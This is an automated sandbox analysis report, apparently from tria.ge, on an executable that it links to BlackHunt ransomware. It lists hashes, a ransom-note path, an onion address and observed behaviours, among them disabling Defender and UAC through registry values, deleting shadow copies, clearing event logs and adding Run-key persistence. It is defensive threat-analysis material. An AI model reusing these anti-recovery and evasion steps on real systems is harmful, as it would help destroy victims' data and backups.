Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 22:44
Static task
static1
Behavioral task
behavioral1
Sample
20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
Resource
win10v2004-20231222-en
General
-
Target
20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe
-
Size
707KB
-
MD5
e6e042228afcc18239f234c4e9d44d55
-
SHA1
bfec002de8e368ea515c656a9cc8c200f357b0eb
-
SHA256
20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5
-
SHA512
50447dbb92b15d5f332cbd4129b7dcadd0e04849f6bf1c75a94f19bf49f7903c9a2a98bb47e48c32f91bdd3dc8e5912689b11853fdb94e06d1a246b754663aa6
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1T8xvnh:6uaTmkZJ+naie5OTamgEoKxLWSlh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1440 fsutil.exe 2400 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1992 wevtutil.exe 688 wevtutil.exe 884 wevtutil.exe 1756 wevtutil.exe 2384 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2364 bcdedit.exe 2568 bcdedit.exe 1716 bcdedit.exe 436 bcdedit.exe -
Renames multiple (2878) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 328 wbadmin.exe 3004 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2936 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\P: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\G: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\E: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\T: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\K: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\L: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\B: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\Y: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\U: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\A: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\Z: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\N: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\W: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\R: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\H: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\J: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\O: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\S: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\X: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\V: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\M: 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened (read-only) \??\M: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable_1.4.1.v20140210-1835.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtobe 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\charsets.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\DVD Maker\Shared\Common.fxh 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_rgb6.wmv 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\DVD Maker\fieldswitch.ax 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#BlackHunt_ReadMe.hta 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Monterrey 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_SelectionSubpicture.png 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#BlackHunt_ReadMe.txt 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File created C:\Program Files\7-Zip\#BlackHunt_Private.key 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Inuvik 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureB.png 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1580 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1704 vssadmin.exe 588 vssadmin.exe 472 vssadmin.exe 1768 vssadmin.exe 2220 vssadmin.exe 2512 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2724 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2792 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1276 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeRestorePrivilege 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeBackupPrivilege 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeTakeOwnershipPrivilege 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeAuditPrivilege 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeSecurityPrivilege 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeIncBasePriorityPrivilege 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Token: SeBackupPrivilege 2908 wbengine.exe Token: SeRestorePrivilege 2908 wbengine.exe Token: SeSecurityPrivilege 2908 wbengine.exe Token: SeBackupPrivilege 2716 vssvc.exe Token: SeRestorePrivilege 2716 vssvc.exe Token: SeAuditPrivilege 2716 vssvc.exe Token: SeSecurityPrivilege 2384 wevtutil.exe Token: SeSecurityPrivilege 688 wevtutil.exe Token: SeBackupPrivilege 2384 wevtutil.exe Token: SeBackupPrivilege 688 wevtutil.exe Token: SeSecurityPrivilege 884 wevtutil.exe Token: SeBackupPrivilege 884 wevtutil.exe Token: SeSecurityPrivilege 1756 wevtutil.exe Token: SeBackupPrivilege 1756 wevtutil.exe Token: SeSecurityPrivilege 1992 wevtutil.exe Token: SeBackupPrivilege 1992 wevtutil.exe Token: SeDebugPrivilege 2724 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2664 wrote to memory of 2724 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 29 PID 2664 wrote to memory of 2724 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 29 PID 2664 wrote to memory of 2724 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 29 PID 2664 wrote to memory of 2724 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 29 PID 2664 wrote to memory of 2784 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 31 PID 2664 wrote to memory of 2784 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 31 PID 2664 wrote to memory of 2784 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 31 PID 2664 wrote to memory of 2784 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 31 PID 2724 wrote to memory of 2812 2724 cmd.exe 33 PID 2724 wrote to memory of 2812 2724 cmd.exe 33 PID 2724 wrote to memory of 2812 2724 cmd.exe 33 PID 2664 wrote to memory of 2848 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 34 PID 2664 wrote to memory of 2848 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 34 PID 2664 wrote to memory of 2848 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 34 PID 2664 wrote to memory of 2848 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 34 PID 2784 wrote to memory of 2708 2784 cmd.exe 36 PID 2784 wrote to memory of 2708 2784 cmd.exe 36 PID 2784 wrote to memory of 2708 2784 cmd.exe 36 PID 2664 wrote to memory of 3000 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 37 PID 2664 wrote to memory of 3000 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 37 PID 2664 wrote to memory of 3000 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 37 PID 2664 wrote to memory of 3000 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 37 PID 2664 wrote to memory of 2292 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 39 PID 2664 wrote to memory of 2292 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 39 PID 2664 wrote to memory of 2292 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 39 PID 2664 wrote to memory of 2292 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 39 PID 2848 wrote to memory of 2852 2848 cmd.exe 41 PID 2848 wrote to memory of 2852 2848 cmd.exe 41 PID 2848 wrote to memory of 2852 2848 cmd.exe 41 PID 3000 wrote to memory of 2108 3000 cmd.exe 42 PID 3000 wrote to memory of 2108 3000 cmd.exe 42 PID 3000 wrote to memory of 2108 3000 cmd.exe 42 PID 2664 wrote to memory of 2608 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 43 PID 2664 wrote to memory of 2608 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 43 PID 2664 wrote to memory of 2608 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 43 PID 2664 wrote to memory of 2608 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 43 PID 2664 wrote to memory of 2972 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 44 PID 2664 wrote to memory of 2972 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 44 PID 2664 wrote to memory of 2972 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 44 PID 2664 wrote to memory of 2972 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 44 PID 2664 wrote to memory of 2748 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 47 PID 2664 wrote to memory of 2748 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 47 PID 2664 wrote to memory of 2748 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 47 PID 2664 wrote to memory of 2748 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 47 PID 2292 wrote to memory of 1668 2292 cmd.exe 48 PID 2292 wrote to memory of 1668 2292 cmd.exe 48 PID 2292 wrote to memory of 1668 2292 cmd.exe 48 PID 2664 wrote to memory of 2636 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 49 PID 2664 wrote to memory of 2636 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 49 PID 2664 wrote to memory of 2636 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 49 PID 2664 wrote to memory of 2636 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 49 PID 2664 wrote to memory of 2800 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 50 PID 2664 wrote to memory of 2800 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 50 PID 2664 wrote to memory of 2800 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 50 PID 2664 wrote to memory of 2800 2664 